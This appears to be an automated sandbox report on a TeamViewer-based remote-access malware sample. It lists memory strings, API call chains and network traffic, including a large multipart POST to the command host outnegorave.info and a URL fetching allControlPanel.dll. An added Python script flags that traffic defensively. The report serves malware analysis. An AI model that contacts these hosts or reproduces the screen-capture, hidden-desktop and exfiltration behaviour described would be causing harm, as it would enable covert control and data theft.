Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr | String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr | String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp | String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp | String found in binary or memory: https://outnegorave.info/
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp | String found in binary or memory: https://outnegorave.info/6
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp | String found in binary or memory: https://outnegorave.info/8C631A8/
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp | String found in binary or memory: https://outnegorave.info/B8C631A8/
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmp | String found in binary or memory: https://outnegorave.info/B8C631A8/70
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp | String found in binary or memory: https://outnegorave.info/B8C631A8/87096&p=10000001
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmp | String found in binary or memory: https://outnegorave.info/B8C631A8/s
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmp | String found in binary or memory: https://outnegorave.info/B8C631A8/x
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp | String found in binary or memory: https://outnegorave.info/allControlPanel.dll
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr | String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp | String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/info/privacy
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmp | String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.dr | String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 0000000E.00000003.467072130.000001C495981000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.467089895.000001C495E02000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown | HTTP traffic detected: POST /B8C631A8/ HTTP/1.1 | Content-Length: 87812 | Content-Type: multipart/form-data; boundary=--------2771230636 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: outnegorave.info | Connection: Close | Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F335540 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoA,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master1.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: 37.252.232.109 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: 37.252.232.109 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
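The traffic rows above carry the same DynGate User-Agent for two different things: TeamViewer's own tunnel requests (GET /din.aspx and /dout.aspx to master1.teamviewer.com, and to a router reached by bare IP) and a multipart POST of 87812 bytes to outnegorave.info, the host that also appears in the strings recovered from TeamViewer.exe memory. The Python below is an added example, not part of the report or of any vendor tooling: it parses request heads of that shape, separates the vendor tunnel traffic from DynGate-UA requests to other hosts, and reuses the same host classifier on extracted URL strings. The vendor-domain list, the certificate-policy allowlist and the sample inputs are this example's assumptions, reconstructed from the rows above.

```python
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from urllib.parse import urlsplit

# Request heads reconstructed from the traffic rows; the report runs the headers
# together, so they are re-split on CRLF here (constructed input).
SAMPLE_REQUESTS = [
    ("POST /B8C631A8/ HTTP/1.1\r\nContent-Length: 87812\r\n"
     "Content-Type: multipart/form-data; boundary=--------2771230636\r\n"
     "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)\r\n"
     "Host: outnegorave.info\r\nConnection: Close\r\nCache-Control: no-cache\r\n\r\n"),
    ("GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1\r\n"
     "Accept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)\r\n"
     "Host: master1.teamviewer.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"),
    ("GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1\r\n"
     "Accept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)\r\n"
     "Host: 37.252.232.109\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"),
]

# URL strings from the report paired with the process they were found in (constructed subset).
SAMPLE_STRINGS = [
    ("TeamViewer.exe", "http://www.teamviewer.com/download/beta.aspx"),
    ("TeamViewer.exe", "https://outnegorave.info/B8C631A8/"),
    ("TeamViewer.exe", "https://outnegorave.info/allControlPanel.dll"),
    ("77Etc0bR2v.exe", "https://sectigo.com/CPS0"),
]

# Assumptions: these suffixes are treated as TeamViewer's own infrastructure, and
# CA policy URLs carried by Authenticode signatures are treated as benign noise.
VENDOR_DOMAINS = ("teamviewer.com", "dyngate.com")
CERT_POLICY_DOMAINS = ("digicert.com", "sectigo.com")
DYNGATE_PATHS = ("/din.aspx", "/dout.aspx")


@dataclass
class Request:
    method: str
    path: str
    headers: dict[str, str]


def parse_request(raw: str) -> Request:
    """Parse an HTTP/1.x request head: request line plus CRLF-separated headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return Request(method, target.split("?", 1)[0], headers)


def classify_host(host: str) -> str:
    """'vendor' for TeamViewer domains, 'ip' for bare addresses, 'cert' for CA policy hosts, else 'other'."""
    name = host.split(":", 1)[0].lower()
    try:
        ipaddress.ip_address(name)
        return "ip"
    except ValueError:
        pass
    under = lambda domains: any(name == d or name.endswith("." + d) for d in domains)
    if under(VENDOR_DOMAINS):
        return "vendor"
    if under(CERT_POLICY_DOMAINS):
        return "cert"
    return "other"


def assess_request(req: Request) -> tuple[str, str]:
    """Return (severity, reason); DynGate is the User-Agent of TeamViewer's HTTP tunnel."""
    ua = req.headers.get("user-agent", "")
    host = req.headers.get("host", "")
    if "DynGate" not in ua:
        return "none", "not a DynGate client"
    kind = classify_host(host)
    tunnel_shape = req.method == "GET" and req.path in DYNGATE_PATHS
    if kind == "vendor" and tunnel_shape:
        return "none", f"DynGate tunnel request to vendor host {host}"
    if kind == "ip" and tunnel_shape:
        # TeamViewer routers are reached by bare IP and keep the /din.aspx shape in
        # this report; confirming the address against the vendor's published ranges
        # is left to the analyst (assumption, not something the report states).
        return "low", f"DynGate tunnel request to bare IP {host}"
    reasons = [f"DynGate UA to {kind} host {host}"]
    if req.method != "GET":
        reasons.append(f"{req.method} instead of the GET /din.aspx|/dout.aspx tunnel shape")
    if req.headers.get("content-type", "").startswith("multipart/form-data"):
        reasons.append(f"multipart upload of {req.headers.get('content-length', '?')} bytes")
    return "high", "; ".join(reasons)


def triage(raw_requests, strings):
    """Run both checks; returns (flagged requests as (host, severity, reason), suspicious string hosts)."""
    flagged = [(r.headers.get("host", ""), sev, why)
               for r in map(parse_request, raw_requests)
               for sev, why in [assess_request(r)] if sev != "none"]
    hosts = sorted({urlsplit(u).hostname for _, u in strings
                    if classify_host(urlsplit(u).hostname or "") == "other"})
    return flagged, hosts
```

Run against the samples, the POST to outnegorave.info is the only high-severity hit and the same host is the only non-vendor, non-CA host among the strings; the bare-IP tunnel request is kept at low severity rather than dropped, since a DynGate client talking to an address outside the vendor's ranges would look identical.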
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F3366E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33A130 CharLowerA,CreateEventA,GetLastError,CloseHandle,GetCurrentThreadId,GetThreadDesktop,CloseHandle,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,CloseHandle,
Source: 77Etc0bR2v.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_00404853
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_00406131
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004A13AA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_0053E430
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004C97CD
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_00534810
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_005438ED
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_00544B6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_00546FFB
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_02723161
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_0272283C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_02722424
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_02722004
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_0272460B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_02723161
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_0272283C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_02722424
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_02722004
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_0272460B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_026F6828
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_026F7104
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_026F6000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: String function: 0053BCE8 appears 68 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F333610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33B1F0 NtSuspendThread,NtClose,
